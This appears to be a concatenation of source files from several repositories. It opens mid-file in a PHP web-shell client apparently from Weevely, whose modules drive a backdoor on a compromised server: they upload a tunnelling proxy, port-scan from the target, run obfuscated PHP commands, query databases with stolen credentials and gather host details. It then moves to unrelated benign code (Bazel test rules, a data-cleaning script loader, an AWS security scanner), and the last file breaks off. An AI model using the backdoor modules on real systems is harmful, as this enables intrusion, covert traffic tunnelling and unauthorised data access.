def _verify_vector_execution(self):
file = NamedTemporaryFile()
file.close()
self.args['lpath'] = file.name
return Download._verify_vector_execution(self)
def _stringify_result(self):
self._result = self._content
return ModuleGuess._stringify_result(self)
```
#### File: net/external/local_proxy.py
```python
import SocketServer
import urllib
from thread import start_new_thread
from sys import argv, exit
import re
class ProxyHandler(SocketServer.StreamRequestHandler):
def __init__(self, request, client_address, server):
self.proxies = {}
self.useragent = server.agent
self.phpproxy = server.rurl
try:
SocketServer.StreamRequestHandler.__init__(self, request, client_address,server)
except Exception, e:
raise
def handle(self):
req, body, cl, req_len, read_len = '', 0, 0, 0, 4096
try:
while 1:
if not body:
line = self.rfile.readline(read_len)
if line == '':
# send it anyway..
self.send_req(req)
return
#if line[0:17].lower() == 'proxy-connection:':
# req += "Connection: close\r\n"
# continue
req += line
if not cl:
t = re.compile('^Content-Length: (\d+)', re.I).search(line)
if t is not None:
cl = int(t.group(1))
continue
if line == "\015\012" or line == "\012":
if not cl:
self.send_req(req)
return
else:
body = 1
read_len = cl
else:
buf = self.rfile.read(read_len)
req += buf
req_len += len(buf)
read_len = cl - req_len
if req_len >= cl:
self.send_req(req)
return
except Exception, e:
raise
def send_req(self, req):
#print req
if req == '':
return
ua = urllib.FancyURLopener(self.proxies)
ua.addheaders = [('User-Agent', self.useragent)]
r = ua.open(self.phpproxy, urllib.urlencode({'req': req}))
while 1:
c = r.read(2048)
if c == '': break
self.wfile.write(c)
self.wfile.close()
if __name__ == "__main__":
if len(argv) < 5:
print '[!] Usage: ./local_proxy.py <localhost> <localport> <rurl> <useragent>'
exit(1)
lhost = argv[1]
lport = int(argv[2])
rurl = argv[3]
agent = argv[4]
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.ThreadingTCPServer((lhost, lport), ProxyHandler)
server.rurl = rurl
server.agent = agent
server.serve_forever()
```
#### File: modules/net/ifaces.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser
from external.ipaddr import IPNetwork
import re
WARN_NO_OUTPUT = 'No execution output'
WARN_NO_IFACES = 'No interfaces address found'
class Ifaces(Module):
'''Print interfaces addresses'''
def _set_vectors(self):
self.support_vectors.add_vector('enum', 'file.enum', ["asd", "-pathlist", "$pathlist"])
self.support_vectors.add_vector( "ifconfig" , 'shell.sh', "$ifconfig_path")
def _probe(self):
self._result = {}
enum_pathlist = str([ x + 'ifconfig' for x in ['/sbin/', '/bin/', '/usr/bin/', '/usr/sbin/', '/usr/local/bin/', '/usr/local/sbin/'] ])
ifconfig_pathlist = self.support_vectors.get('enum').execute({'pathlist' : enum_pathlist })
for path in ifconfig_pathlist:
if ifconfig_pathlist[path] != ['','','','']:
result = self.support_vectors.get('ifconfig').execute({'ifconfig_path' : path })
if result:
ifaces = re.findall(r'^(\S+).*?inet addr:(\S+).*?Mask:(\S+)', result, re.S | re.M)
if ifaces:
for iface in ifaces:
ipnet = IPNetwork('%s/%s' % (iface[1], iface[2]))
self._result[iface[0]] = ipnet
else:
raise ProbeException(self.name, '\'%s\' %s' % (path, WARN_NO_OUTPUT))
def _verify(self):
if not self._result:
raise ProbeException(self.name, WARN_NO_IFACES)
```
#### File: modules/net/phpproxy.py
```python
from modules.file.upload2web import Upload2web
from modules.file.upload import WARN_NO_SUCH_FILE
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser
from core.argparse import SUPPRESS
import re, os
from core.utils import randstr
class Phpproxy(Upload2web):
'''Install remote PHP proxy'''
def _set_args(self):
self.argparser.add_argument('rpath', help='Optional, upload as rpath', nargs='?')
self.argparser.add_argument('-startpath', help='Upload in first writable subdirectory', metavar='STARTPATH', default='.')
self.argparser.add_argument('-chunksize', type=int, default=1024, help=SUPPRESS)
self.argparser.add_argument('-vector', choices = self.vectors.keys(), help=SUPPRESS)
self.argparser.add_argument('-force', action='store_true')
def _get_proxy_path(self):
return os.path.join(self.modhandler.path_modules, 'net', 'external', 'phpproxy.php')
def _prepare(self):
proxy_path = self._get_proxy_path()
if not self.args['rpath']:
# If no rpath, set content and remote final filename as random
try:
content = open(proxy_path, 'r').read()
except Exception, e:
raise ProbeException(self.name, '\'%s\' %s' % (self.args['lpath'], WARN_NO_SUCH_FILE))
self.args['lpath'] = randstr(4) + '.php'
self.args['content'] = content
else:
# Else, set lpath as proxy filename
self.args['lpath'] = proxy_path
self.args['content'] = None
Upload2web._prepare(self)
def _stringify_result(self):
Upload2web._stringify_result(self)
sess_filename = os.path.join(*(self.args['rpath'].split('/')[:-1] + [ 'sess_*']))
self._output = """Php proxy installed, point your browser to %s?u=http://www.google.com .
Delete '%s' and '%s' at session end.""" % ( self.args['url'], self.args['rpath'], sess_filename )
```
#### File: modules/net/proxy.py
```python
from modules.file.upload2web import Upload2web
from modules.net.phpproxy import Phpproxy
from core.moduleexception import ProbeSucceed, ProbeException
from core.argparse import ArgumentParser
from core.argparse import SUPPRESS
from os import path
from random import choice
from core.http.request import agent
from core.utils import url_validator
from subprocess import Popen
from sys import executable
WARN_NOT_URL = 'Not a valid URL'
class Proxy(Phpproxy):
'''Install and run Proxy to tunnel traffic through target'''
def _set_args(self):
self.argparser.add_argument('rpath', help='Optional, upload as rpath', nargs='?')
self.argparser.add_argument('-startpath', help='Upload in first writable subdirectory', metavar='STARTPATH', default='.')
self.argparser.add_argument('-force', action='store_true')
self.argparser.add_argument('-just-run', metavar='URL')
self.argparser.add_argument('-just-install', action='store_true')
self.argparser.add_argument('-lhost', default='127.0.0.1')
self.argparser.add_argument('-lport', default='8081', type=int)
self.argparser.add_argument('-chunksize', type=int, default=1024, help=SUPPRESS)
self.argparser.add_argument('-vector', choices = self.vectors.keys(), help=SUPPRESS)
def _get_proxy_path(self):
return path.join(self.modhandler.path_modules, 'net', 'external', 'proxy.php')
def _get_local_proxy_path(self):
return path.join(self.modhandler.path_modules, 'net', 'external', 'local_proxy.py')
def _prepare(self):
if not self.args['just_run']:
Phpproxy._prepare(self)
else:
if not url_validator.match(self.args['just_run']):
raise ProbeException(self.name, '\'%s\': %s' % (self.args['just_run'], WARN_NOT_URL) )
self.args['url'] = self.args['just_run']
self.args['rpath'] = ''
def _probe(self):
if not self.args['just_run']:
try:
Phpproxy._probe(self)
except ProbeSucceed:
pass
if not self.args['just_install']:
self.pid = Popen([executable, self._get_local_proxy_path(), self.args['lhost'], str(self.args['lport']), self.args['url'], agent]).pid
def _verify(self):
if not self.args['just_run']:
Phpproxy._verify(self)
else:
# With just_run, suppose good result to correctly print output
self._result = True
def _stringify_result(self):
Phpproxy._stringify_result(self)
rpath = ' '
if self.args['rpath']:
rpath = '\'%s\' ' % self.args['rpath']
self._result.append(self.pid)
self._output = """Proxy daemon spawned, set \'http://%s:%i\' as HTTP proxy to start browsing anonymously through target.
Run ":net.proxy -just-run '%s'" to respawn local proxy daemon without reinstalling remote agent.
When not needed anymore, remove remote file with ":file.rm %s" and run locally 'kill -9 %i' to stop proxy.""" % (self.args['lhost'], self.args['lport'], self.args['url'], rpath, self.pid)
```
#### File: modules/net/scan.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser
from external.ipaddr import IPNetwork
import re, os
from core.argparse import SUPPRESS
from core.utils import randstr
from base64 import b64encode
WARN_NO_SUCH_FILE = 'No such file or permission denied'
WARN_INVALID_SCAN = 'Invalid scan range, check syntax'
class Scan(Module):
'''Port scan open TCP ports'''
def _set_vectors(self):
self.support_vectors.add_vector('ifaces', 'net.ifaces', [])
self.support_vectors.add_vector( 'scan', 'shell.php',["""$str = base64_decode($_POST["$post_field"]);
foreach (explode(',', $str) as $s) {
$s2 = explode(' ', $s);
foreach( explode('|', $s2[1]) as $p) {
if($fp = fsockopen("$s2[0]", $p, $n, $e, $timeout=1)) {print(" $s2[0]:$p"); fclose($fp);}
}print(".");}""", "-post", "{\'$post_field\' : \'$data\' }"])
def _set_args(self):
self.argparser.add_argument('addr', help='Single IP, multiple: IP1,IP2,.., networks IP/MASK or firstIP-lastIP, interfaces (ethN)')
self.argparser.add_argument('port', help='Single post, multiple: PORT1,PORT2,.. or firstPORT-lastPORT')
self.argparser.add_argument('-unknown', help='Scan also unknown ports', action='store_true')
self.argparser.add_argument('-ppr', help=SUPPRESS, default=10, type=int)
def _get_service_path(self):
return os.path.join(self.modhandler.path_modules, 'net', 'external', 'nmap-services-tcp.txt')
def _prepare(self):
services_path = self._get_service_path()
try:
services = open(services_path, 'r').read()
except Exception, e:
raise ProbeException(self.name, '\'%s\' %s' % (services_path, WARN_NO_SUCH_FILE))
ifaces_all = self.support_vectors.get('ifaces').execute()
reqlist = RequestList(self.modhandler, services, ifaces_all)
reqlist.add(self.args['addr'], self.args['port'])
if not reqlist:
raise ProbeException(self.name, WARN_INVALID_SCAN)
if self.args['ppr'] == 10 and self.args['addr'] == '127.0.0.1':
self.args['ppr'] = 100
self.args['reqs'] = reqlist
def _probe(self):
while self.args['reqs']:
reqstringarray = ''
requests = self.args['reqs'].get_requests(self.args['ppr'])
for host, ports in requests.items():
portschunk = map(str, (ports))
reqstringarray += '%s %s,' % (host, '|'.join(portschunk))
output = 'SCAN %s:%s-%s ' % (host, portschunk[0], portschunk[-1])
result = self.support_vectors.get('scan').execute({'post_field' : randstr(), 'data' : b64encode('%s' % reqstringarray[:-1])})
if result != '.':
output += 'OPEN: ' + result.strip()[:-1]
self._result += result.strip()[:-1]
print output
def _stringify_result(self):
self._output = ''
class RequestList(dict):
def __init__(self, modhandler, nmap_file, ifaces):
self.modhandler = modhandler
self.port_list = []
self.ifaces = ifaces
self.nmap_ports = []
self.nmap_services = {}
for line in nmap_file.splitlines():
name, port = line.split()
self.nmap_services[int(port)] = name
self.nmap_ports.append(int(port))
dict.__init__(self)
def get_requests(self, howmany):
to_return = {}
requests = 0
# Filling request
for ip in self:
while self[ip]:
if requests >= howmany:
break
if ip not in to_return:
to_return[ip] = []
to_return[ip].append(self[ip].pop(0))
requests+=1
if requests >= howmany:
break
# Removing empty ips
for ip, ports in self.items():
if not ports:
del self[ip]
return to_return
def add(self, net, port):
""" First add port to duplicate for every inserted host """
if ',' in port:
port_ranges = port.split(',')
else:
port_ranges = [ port ]
for ports in port_ranges:
self.__set_port_ranges(ports)
# If there are available ports
if self.port_list:
if ',' in net:
addresses = net.split(',')
else:
addresses = [ net ]
for addr in addresses:
self.__set_networks(addr)
def __set_port_ranges(self, given_range):
start_port = None
end_port = None
if given_range.count('-') == 1:
try:
splitted_ports = [ int(strport) for strport in given_range.split('-') if (int(strport) > 0 and int(strport) <= 65535)]
except ValueError:
return None
else:
if len(splitted_ports) == 2:
start_port = splitted_ports[0]
end_port = splitted_ports[1]
else:
try:
int_port = int(given_range)
except ValueError:
return None
else:
start_port = int_port
end_port = int_port
if start_port and end_port:
self.port_list += [ p for p in range(start_port, end_port+1) if p in self.nmap_ports]
else:
raise ModuleException('net.scan', 'Error parsing port numbers \'%s\'' % given_range)
def __get_network_from_ifaces(self, iface):
if iface in self.ifaces.keys():
return self.ifaces[iface]
def __set_networks(self, addr):
networks = []
try:
# Parse single IP or networks
networks.append(IPNetwork(addr))
except ValueError:
#Parse IP-IP
if addr.count('-') == 1:
splitted_addr = addr.split('-')
# Only address supported
try:
start_address = IPAddress(splitted_addr[0])
end_address = IPAddress(splitted_addr[1])
except ValueError:
pass
else:
networks += summarize_address_range(start_address, end_address)
else:
# Parse interface name
remote_iface = self.__get_network_from_ifaces(addr)
if remote_iface:
networks.append(remote_iface)
else:
# Try to resolve host
try:
networks.append(IPNetwork(gethostbyname(addr)))
except:
pass
if not networks:
print '[net.scan] Warning: \'%s\' is not an IP address, network or detected interface' % ( addr)
else:
for net in networks:
for ip in net:
self[str(ip)] = self.port_list[:]
```
#### File: modules/shell/php.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException, ProbeSucceed, InitException
from core.http.cmdrequest import CmdRequest, NoDataException
from core.argparse import ArgumentParser, StoredNamespace
from core.argparse import SUPPRESS
from ast import literal_eval
import random, os, shlex, types
WARN_PROXY = 'Proxies can break weevely requests, use proxychains'
WARN_TRAILING_SEMICOLON = 'command does not have trailing semicolon'
WARN_NO_RESPONSE = 'No response'
WARN_UNREACHABLE = 'URL or proxy unreachable'
WARN_CONN_ERR = 'Error connecting to backdoor URL or proxy'
WARN_INVALID_RESPONSE = 'skipping invalid response'
WARN_PHP_INTERPRETER_FAIL = 'PHP and Shell interpreters load failed'
MSG_PHP_INTERPRETER_SUCCEED = 'PHP and Shell interpreters load succeed'
class Php(Module):
'''Execute PHP statement'''
mode_choices = ['Cookie', 'Referer' ]
def _init_stored_args(self):
self.stored_args_namespace = StoredNamespace()
setattr(self.stored_args_namespace, 'mode', None)
setattr(self.stored_args_namespace, 'path', '')
def _set_args(self):
self.argparser.add_argument('cmd', help='PHP command enclosed with brackets and terminated by semi-comma', nargs='+' )
self.argparser.add_argument('-mode', help='Obfuscation mode', choices = self.mode_choices)
self.argparser.add_argument('-proxy', help='HTTP proxy. Support \'http://\', \'socks5://\', \'socks4://\'')
self.argparser.add_argument('-precmd', help='Insert string at beginning of commands', nargs='+' )
self.argparser.add_argument('-debug', help='Change debug class (3 or less to show request and response)', type=int, default=4, choices =range(1,5))
self.argparser.add_argument('-post', help=SUPPRESS, type=type({}), default={})
self.argparser.add_argument('-just-probe', help=SUPPRESS, action='store_true')
def _set_vectors(self):
self.support_vectors.add_vector(name='ls', interpreter='file.ls', payloads = [ '$rpath' ])
def _prepare(self):
# Slacky backdoor validation.
# Avoid probing (and storing) if mode is specified by user
if not self.args['mode'] or self.args['just_probe']:
if not getattr(self.stored_args_namespace,'mode') or self.args['just_probe']:
self.__slacky_probe()
self.args['mode'] = getattr(self.stored_args_namespace,'mode')
# Check if is raw command is not 'ls'
if self.args['cmd'][0][:2] != 'ls':
# Warn about not ending semicolon
if self.args['cmd'] and self.args['cmd'][-1][-1] not in (';', '}'):
self.mprint('\'..%s\' %s' % (self.args['cmd'][-1], WARN_TRAILING_SEMICOLON))
# Prepend chdir
if getattr(self.stored_args_namespace,'path'):
self.args['cmd'] = [ 'chdir(\'%s\');' % (getattr(self.stored_args_namespace,'path')) ] + self.args['cmd']
# Prepend precmd
if self.args['precmd']:
self.args['cmd'] = self.args['precmd'] + self.args['cmd']
def _probe(self):
# If 'ls', execute __ls_handler
if self.args['cmd'][0][:2] == 'ls':
rpath = ''
if ' ' in self.args['cmd'][0]:
rpath = self.args['cmd'][0].split(' ')[1]
self._result = '\n'.join(self.support_vectors.get('ls').execute({'rpath' : rpath }))
else:
self._result = self.__do_request(self.args['cmd'], self.args['mode'])
def __do_request(self, listcmd, mode):
cmd = listcmd
if isinstance(listcmd, types.ListType):
cmd = ' '.join(listcmd)
request = CmdRequest( self.modhandler.url, self.modhandler.password, self.args['proxy'])
request.setPayload(cmd, mode)
msg_class = self.args['debug']
if self.args['post']:
request.setPostData(self.args['post'])
self.mprint( "Post data values:", msg_class)
for field in self.args['post']:
self.mprint(" %s (%i)" % (field, len(self.args['post'][field])), msg_class)
self.mprint( "Request: %s" % (cmd), msg_class)
try:
response = request.execute()
except NoDataException, e:
raise ProbeException(self.name, WARN_NO_RESPONSE)
except IOError, e:
raise ProbeException(self.name, '%s. %s' % (e.strerror, WARN_UNREACHABLE))
except Exception, e:
raise ProbeException(self.name, '%s. %s' % (str(e), WARN_CONN_ERR))
if 'eval()\'d code' in response:
if len(response)>=100:
response_sum = '...' + response[-100:]
else:
response_sum = response
raise ProbeException(self.name, '%s: \'%s\'' % (WARN_INVALID_RESPONSE, response_sum))
self.mprint( "Response: %s" % response, msg_class)
return response
def __slacky_probe(self):
for currentmode in self.mode_choices:
rand = str(random.randint( 11111, 99999 ))
try:
response = self.__do_request('print(%s);' % (rand), currentmode)
except ProbeException, e:
self.mprint('%s with %s method' % (e.error, currentmode))
continue
if response == rand:
setattr(self.stored_args_namespace, 'mode', currentmode)
if self.args['just_probe']:
self._result = True
raise ProbeSucceed(self.name, MSG_PHP_INTERPRETER_SUCCEED)
return
raise InitException(self.name, WARN_PHP_INTERPRETER_FAIL)
```
#### File: modules/sql/console.py
```python
from core.module import Module
from core.moduleexception import ModuleException, ProbeException
from core.argparse import ArgumentParser, StoredNamespace
import re
WARN_NO_DATA = 'No data returned'
WARN_CHECK_CRED = 'check credentials and dbms availability'
class Console(Module):
'''Run SQL console or execute single queries'''
def _set_vectors(self):
self.support_vectors.add_vector('mysql', 'shell.php', ["""if(mysql_connect("$host","$user","$pass")){
$result = mysql_query("$query"); if($result) {
while ($content = mysql_fetch_row($result)) {
foreach($content as $key => $value){echo $value . "|";} echo "\n";}}
mysql_close();}""" ])
self.support_vectors.add_vector('mysql_fallback', 'shell.php', [ """$result = mysql_query("$query");
if($result) {
while ($content = mysql_fetch_row($result)) {
foreach($content as $key => $value){echo $value . "|";} echo "\n";}}"""]),
self.support_vectors.add_vector('pg', 'shell.php', ["""if(pg_connect("host=$host user=$user password=$<PASSWORD>")){
$result = pg_query("$query"); if($result) {
while ($content = pg_fetch_row($result)) {
foreach($content as $key => $value){echo $value . "|";} echo "\n";}}
pg_close();}""" ]),
self.support_vectors.add_vector('pg_fallback', 'shell.php', [ """$result = pg_query("$query");
if($result) {
while ($content = pg_fetch_row($result)) {
foreach($content as $key => $value){echo $value . "|";} echo "\n";}}
pg_close();"""])
def _set_args(self):
self.argparser.add_argument('-user', help='SQL username')
self.argparser.add_argument('-pass', help='SQL password')
self.argparser.add_argument('-host', help='DBMS host or host:port', default='127.0.0.1')
self.argparser.add_argument('-dbms', help='DBMS', choices = ['mysql', 'postgres'], default='mysql')
self.argparser.add_argument('-query', help='Execute single query')
def _init_stored_args(self):
self.stored_args_namespace = StoredNamespace()
setattr(self.stored_args_namespace, 'vector', '')
setattr(self.stored_args_namespace, 'prompt', 'SQL> ')
def _prepare(self):
self.args['vector'] = 'pg' if self.args['dbms'] == 'postgres' else 'mysql'
if not self.args['user'] or not self.args['pass']:
self.args['vector'] += '_fallback'
def _probe(self):
if not self.args['query']:
self._check_credentials()
while True:
self._result = None
self._output = ''
query = raw_input( getattr(self.stored_args_namespace,'prompt') ).strip()
if not query:
continue
self._result = self._query(query)
if self._result == None:
self.mprint('%s %s' % (WARN_NO_DATA, WARN_CHECK_CRED))
elif not self._result:
self.mprint(WARN_NO_DATA)
else:
self._stringify_result()
print self._output
else:
self._result = self._query(self.args['query'])
if self._result == None:
self.mprint('%s, %s.' % (WARN_NO_DATA, WARN_CHECK_CRED))
def _query(self, query):
result = self.support_vectors.get(self.args['vector']).execute({ 'host' : self.args['host'], 'user' : self.args['user'], 'pass' : self.args['pass'], 'query' : query })
if result:
return [ line.split('|') for line in result[:-1].replace('|\n', '\n').split('\n') ]
def _check_credentials(self):
get_current_user = 'SELECT USER;' if self.args['vector']== 'postgres' else 'SELECT USER();'
user = self.support_vectors.get(self.args['dbms']).execute({ 'host' : self.args['host'], 'user' : self.args['user'], 'pass' : self.args['pass'], 'query' : get_current_user })
if user:
user = user[:-1]
setattr(self.stored_args_namespace, 'vector', self.args['vector'])
setattr(self.stored_args_namespace, 'prompt', '%s SQL> ' % user)
else:
raise ProbeException(self.name, "%s of %s " % (WARN_CHECK_CRED, self.args['host']) )
```
#### File: modules/system/info.py
```python
from core.module import Module
from core.moduleexception import ModuleException
from core.argparse import ArgumentParser
from core.vector import VectorsDict
import urllib2
from re import compile
re_lsb_release = compile('Description:[ \t]+(.+)')
re_etc_lsb_release = compile('(?:DISTRIB_DESCRIPTION|PRETTY_NAME)="(.+)"')
re_exitaddress = compile('\nExitAddress[\s]+([^\s]+)')
WARN_NO_EXITLIST = 'Error downloading TOR exit list'
class Info(Module):
"""Collect system informations"""
def _set_vectors(self):
self.support_vectors.add_vector('document_root', 'shell.php', "@print($_SERVER['DOCUMENT_ROOT']);"),
self.support_vectors.add_vector('whoami', 'shell.php', "$u=@posix_getpwuid(posix_geteuid()); if($u) { $u = $u['name']; } else { $u=getenv('username'); } print($u);"),
self.support_vectors.add_vector('hostname', 'shell.php', "@print(gethostname());"),
self.support_vectors.add_vector('cwd', 'shell.php', "@print(getcwd());"),
self.support_vectors.add_vector('open_basedir', 'shell.php', "$v=@ini_get('open_basedir'); if($v) print($v);"),
self.support_vectors.add_vector('safe_mode', 'shell.php', "(ini_get('safe_mode') && print(1)) || print(0);"),
self.support_vectors.add_vector('script', 'shell.php', "@print($_SERVER['SCRIPT_NAME']);"),
self.support_vectors.add_vector('uname', 'shell.php', "@print(php_uname());"),
self.support_vectors.add_vector('os', 'shell.php', "@print(PHP_OS);"),
self.support_vectors.add_vector('client_ip', 'shell.php', "@print($_SERVER['REMOTE_ADDR']);"),
self.support_vectors.add_vector('max_execution_time', 'shell.php', '@print(ini_get("max_execution_time"));'),
self.support_vectors.add_vector('php_self', 'shell.php', '@print($_SERVER["PHP_SELF"]);')
self.support_vectors.add_vector('dir_sep' , 'shell.php', '@print(DIRECTORY_SEPARATOR);')
self.support_vectors.add_vector('php_version' , 'shell.php', "$v=''; if(function_exists( 'phpversion' )) { $v=phpversion(); } elseif(defined('PHP_VERSION')) { $v=PHP_VERSION; } elseif(defined('PHP_VERSION_ID')) { $v=PHP_VERSION_ID; } print($v);")
self.release_support_vectors = VectorsDict(self.modhandler)
self.release_support_vectors.add_vector('lsb_release' , 'shell.sh', 'lsb_release -d')
self.release_support_vectors.add_vector('read' , 'file.read', '$rpath')
def _set_args(self):
additional_args = ['all', 'release', 'check_tor']
self.argparser.add_argument('info', help='Information', choices = self.support_vectors.keys() + additional_args, default='all', nargs='?')
def __check_tor(self):
exitlist_urls = ('http://exitlist.torproject.org/exit-addresses', 'http://exitlist.torproject.org/exit-addresses.new')
exitlist_content = ''
for url in exitlist_urls:
try:
exitlist_content += urllib2.urlopen(url, timeout=1).read() + '\n'
except Exception, e:
self.mprint('%s: \'%s\'' % ( WARN_NO_EXITLIST, url))
addresses = re_exitaddress.findall(exitlist_content)
client_ip = self.support_vectors.get('client_ip').execute()
return client_ip in addresses
def __guess_release(self):
lsb_release_output = self.release_support_vectors.get('lsb_release').execute()
if lsb_release_output:
rel = re_lsb_release.findall(lsb_release_output)
if rel: return rel[0]
for rpath in ('/etc/lsb-release', '/etc/os-release',):
etc_lsb_release_content = self.release_support_vectors.get('read').execute({'rpath' : rpath})
if etc_lsb_release_content:
rel = re_etc_lsb_release.findall(etc_lsb_release_content)
if rel: return rel[0]
for rpath in ('/etc/issue.net', '/etc/issue',):
etc_issue_content = self.release_support_vectors.get('read').execute({'rpath' : rpath}).strip()
if etc_issue_content:
return etc_issue_content
return ''
def _probe(self):
if self.args['info'] == 'check_tor':
self._result = self.__check_tor()
elif self.args['info'] == 'release':
self._result = self.__guess_release().strip()
elif self.args['info'] != 'all':
self._result = self.support_vectors.get(self.args['info']).execute()
else:
self._result = {}
for vect in self.support_vectors.values():
self._result[vect.name] = vect.execute()
self._result['release'] = self.__guess_release()
self._result['check_tor'] = self.__check_tor()
```
|
{
"source": "jez/as-tree-cpp",
"score": 2
}
|
#### File: as-tree-cpp/test/diff_tests.bzl
```python
def diff_tests(input_files):
tests = []
updates = []
for input_file in input_files:
genrule_name = "gen_{}.actual".format(input_file)
actual_file = "{}.actual".format(input_file)
native.genrule(
name = genrule_name,
srcs = [input_file],
outs = [actual_file],
tools = ["//main:as-tree"],
cmd = "$(location //main:as-tree) $(location {input_file}) > $(location {actual_file})".format(
input_file = input_file,
actual_file = actual_file
),
testonly = True,
# This is manual to avoid being caught with `//...`
tags = ["manual"],
)
test_name = "test_{}".format(input_file)
exp_file = "{}.exp".format(input_file)
native.sh_test(
name = test_name,
srcs = ["diff_one.sh"],
args = [
"$(location {})".format(exp_file),
"$(location {})".format(actual_file),
],
data = [
exp_file,
actual_file,
],
size = "small",
tags = [],
)
update_name = "update_{}".format(input_file)
native.sh_test(
name = update_name,
srcs = ["update_one.sh"],
args = [
"$(location {})".format(actual_file),
"$(location {})".format(exp_file),
],
data = [
actual_file,
exp_file,
],
size = "small",
tags = [
# Avoid being caught with `//...`
"manual",
# Forces the test to be run locally, without sandboxing
"local",
# Unconditionally run this rule, and don't run in the sandbox
"external",
],
)
tests.append(test_name)
updates.append(update_name)
native.test_suite(
name = "test",
tests = tests,
)
native.test_suite(
name = "update",
tests = updates,
tags = ["manual"],
)
```
|
{
"source": "jez/awkward-bun",
"score": 2
}
|
#### File: jez/awkward-bun/util.py
```python
from __future__ import print_function
import settings
def log(*args, **kwargs):
if settings.DEBUG:
print(*args, **kwargs)
def output(*args, **kwargs):
if not settings.DEBUG:
print(*args, **kwargs)
```
|
{
"source": "jezcope/pyrefine",
"score": 4
}
|
#### File: pyrefine/pyrefine/script.py
```python
import json
import os
from .ops import create
class Script(object):
"""A script is a series of operations."""
def __init__(self, s=None):
"""Parse a script from a JSON string."""
if s is not None:
self.parsed_script = json.loads(s)
self.operations = [create(params)
for params in self.parsed_script]
def __len__(self):
"""Return the number of operations."""
return len(self.operations)
def execute(self, data):
"""Execute all operations on the provided dataset.
Args:
data (:class:`pandas.DataFrame`): The data to transform. Not
guaranteed immutable.
Returns:
:class:`pandas.DataFrame`: The transformed data.
"""
for op in self.operations:
data = op(data)
return data
def load_script(f):
"""Load and parse the script given.
Args:
f (:class:`file` or :class:`str`): Open file object or filename.
Returns:
:class:`Script`: The parsed script object.
"""
if isinstance(f, (str, os.PathLike)):
f = open(f)
with f:
return parse(f.read())
parse = Script
```
|
{
"source": "jezd-axyl/platsec-aws-scanner",
"score": 2
}
|
#### File: platsec-aws-scanner/src/aws_scanner_main.py
```python
import logging
from src.aws_parallel_task_runner import AwsParallelTaskRunner
from src.aws_scanner_output import AwsScannerOutput
from src.aws_task_builder import AwsTaskBuilder
from src.clients.aws_client_factory import AwsClientFactory
from src.aws_scanner_argument_parser import AwsScannerArguments
from src.data.aws_scanner_exceptions import AwsScannerException
class AwsScannerMain:
def __init__(self, args: AwsScannerArguments) -> None:
self._main(args)
def _main(self, args: AwsScannerArguments) -> None:
logger = self._configure_logging(args)
try:
factory = AwsClientFactory(mfa=args.mfa_token, username=args.username)
tasks = AwsTaskBuilder(factory, args).build_tasks()
reports = AwsParallelTaskRunner(factory).run(tasks)
AwsScannerOutput(factory).write(args.task, reports)
except AwsScannerException as ex:
logger.error(f"{type(ex).__name__}: {ex}")
raise SystemExit(1)
def _configure_logging(self, args: AwsScannerArguments) -> logging.Logger:
logging.basicConfig(
level=args.log_level,
datefmt="%Y-%m-%dT%H:%M:%S",
format="%(asctime)s %(levelname)s %(module)s %(message)s",
)
logging.getLogger().setLevel(args.log_level)
logging.getLogger("botocore").setLevel(logging.ERROR)
logging.getLogger("urllib3").setLevel(logging.ERROR)
logging.getLogger("requests").setLevel(logging.ERROR)
return logging.getLogger(self.__class__.__name__)
```
#### File: platsec-aws-scanner/src/aws_task_runner.py
```python
from inspect import signature
from logging import getLogger
from typing import Any, Callable, Dict, Sequence, Type
from src.data.aws_scanner_exceptions import UnsupportedClientException
from src.data.aws_task_report import AwsTaskReport
from src.clients.aws_client_factory import AwsClientFactory
from src.tasks.aws_task import AwsTask
from src.clients.aws_athena_client import AwsAthenaClient
from src.clients.aws_cost_explorer_client import AwsCostExplorerClient
from src.clients.aws_iam_audit_client import AwsIamAuditClient
from src.clients.aws_iam_client import AwsIamClient
from src.clients.aws_organizations_client import AwsOrganizationsClient
from src.clients.aws_ssm_client import AwsSSMClient
from src.clients.aws_s3_client import AwsS3Client
from src.clients.composite.aws_central_logging_client import AwsCentralLoggingClient
from src.clients.composite.aws_cloudtrail_client import AwsCloudtrailClient
from src.clients.composite.aws_vpc_client import AwsVpcClient
class AwsTaskRunner:
def __init__(self, client_factory: AwsClientFactory) -> None:
self._logger = getLogger(self.__class__.__name__)
self._client_factory = client_factory
def run(self, tasks: Sequence[AwsTask]) -> Sequence[AwsTaskReport]:
return self._run_tasks(tasks)
def _run_tasks(self, tasks: Sequence[AwsTask]) -> Sequence[AwsTaskReport]:
raise NotImplementedError("this is an abstract class")
def _run_task(self, task: AwsTask) -> AwsTaskReport:
client_param = signature(task._run_task).parameters.get("client")
task_client_mapping: Dict[Type[Any], Callable[[], AwsTaskReport]] = {
AwsAthenaClient: lambda: task.run(self._client_factory.get_athena_client()),
AwsCloudtrailClient: lambda: task.run(self._client_factory.get_cloudtrail_client(task.account)),
AwsCostExplorerClient: lambda: task.run(self._client_factory.get_cost_explorer_client(task.account)),
AwsIamClient: lambda: task.run(self._client_factory.get_iam_client(task.account)),
AwsIamAuditClient: lambda: task.run(self._client_factory.get_iam_client_for_audit(task.account)),
AwsOrganizationsClient: lambda: task.run(self._client_factory.get_organizations_client()),
AwsSSMClient: lambda: task.run(self._client_factory.get_ssm_client(task.account)),
AwsS3Client: lambda: task.run(self._client_factory.get_s3_client(task.account)),
AwsVpcClient: lambda: task.run(self._client_factory.get_vpc_client(task.account)),
AwsCentralLoggingClient: lambda: task.run(self._client_factory.get_central_logging_client()),
}
if not client_param:
raise UnsupportedClientException(f"{task} requires a client argument")
if client_param.annotation not in task_client_mapping:
raise UnsupportedClientException(f"client type {client_param.annotation} is not supported")
return task_client_mapping[client_param.annotation]()
```
#### File: src/clients/aws_athena_async_client.py
```python
from logging import getLogger
from string import Template
from time import sleep
from typing import Any, Dict, List, Type
from botocore.client import BaseClient
from botocore.exceptions import BotoCoreError, ClientError
from src.data import aws_scanner_exceptions as exceptions
from src.clients import aws_athena_system_queries as queries
from src.data.aws_athena_data_partition import AwsAthenaDataPartition
from src.clients.aws_athena_query_states import COMPLETED_STATES, SUCCESS_STATES
from src.data.aws_organizations_types import Account
from src.aws_scanner_config import AwsScannerConfig as Config
class AwsAthenaAsyncClient:
def __init__(self, boto_athena: BaseClient):
